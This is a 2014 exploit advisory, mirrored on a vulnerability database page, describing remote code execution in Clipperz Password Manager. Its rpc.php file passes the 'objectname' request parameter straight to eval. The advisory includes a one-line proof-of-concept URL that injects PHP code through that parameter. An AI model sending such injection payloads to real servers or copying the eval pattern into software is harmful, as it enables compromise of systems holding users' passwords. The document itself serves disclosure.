Lucene search
K

Clipperz Password Manager Code Execution

🗓️ 20 May 2014 00:00:00Reported by Manish TanwarType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 54 Views

Clipperz Password Manager remote code execution vulnerability discovered on 19/05/2014

Code
`###############################################################################   
# Exploit Title : Clipperz Password Manager remote code execution vulnerability  
# Author : Manish Kishan Tanwar   
# Vendor : https://clipperz.is/open_source/clipperz_password_manager/   
# Download Link : https://codeload.github.com/clipperz/password-manager/zip/master  
# Date : 19/05/2014   
#Discovered @ : INDISHELL Lab  
# Love to : zero cool,Team indishell,Hardeep Singh  
##############################################################################   
////////////////////////  
/// Overview:   
////////////////////////   
Clipperz Password Manager script is affected from remote code execution Vulnerabilities.   
  
///////////////////////////////  
// Vulnerability Description:   
///////////////////////////////  
  
there is remote code execution flaw in Clipperz Password Manager script, because it does not checking user user inputs before final processing.   
  
Input passed via the "objectname" parameter to "password-manager-master/backend/php/src/setup/rpc.php" is not properly verified before it is give to server for processing. This can be exploited to execute php code.  
  
//////////////////////////////  
/// Proof of Concept: -  
//////////////////////////////  
vulnerability arises because of following code in file rpc.php  
at line number   
15. $objectName = isset($_REQUEST['objectname']) ? $_REQUEST['objectname'] : '';  
  
37. eval ('$instance = new '.$objectName.'();');  
  
value in objectname parameter is not getting filter before using it at line number 37 and user input is getting eval which is causing remote code execution vulnerability.  
  
/////////////////////////  
/// example exploit   
////////////////////////  
  
http://127.0.0.111/password-manager-master/backend/php/src/setup/rpc.php?objectname=Xmenu();print_r(php_uname());die  
  
  
  
--==[[ Greetz To ]]==--  
############################################################################################  
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,   
#Silent poison India,Magnum sniper,Atul Dwivedi ethicalnoob Indishell,Local root indishell,  
#Irfninja indishell,Reborn India,L0rd Crus4d3r,cool toad,cool shavik,Hackuin,Alicks,Ebin V Thomas   
#Dinelson Amine,Th3 D3str0yer,SKSking,Mr. Trojan,rad paul,Godzila,mike waals,zoozoo,  
#The creator,cyber warrior,Neo hacker ICA,Suriya Prakash, cyber gladiator,Cyber Ace,   
#Golden boy INDIA,Ketan Singh,Yash,Aneesh Dogra,AR AR,saad abbasi,hero,Minhal Mehdi ,Raj bhai ji ,  
#Hacking queen,lovetherisk,brown suger and rest of TEAM INDISHELL  
#############################################################################################  
--==[[Love to]]==--  
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,  
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Anju Gulia,Don(Deepika kaushik) and acche bacchi(Jagriti)  
--==[[ Special Fuck goes to ]]==--  
<3 suriya Cyber Tyson <3  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 May 2014 00:00Current
0.3Low risk
Vulners AI Score0.3
54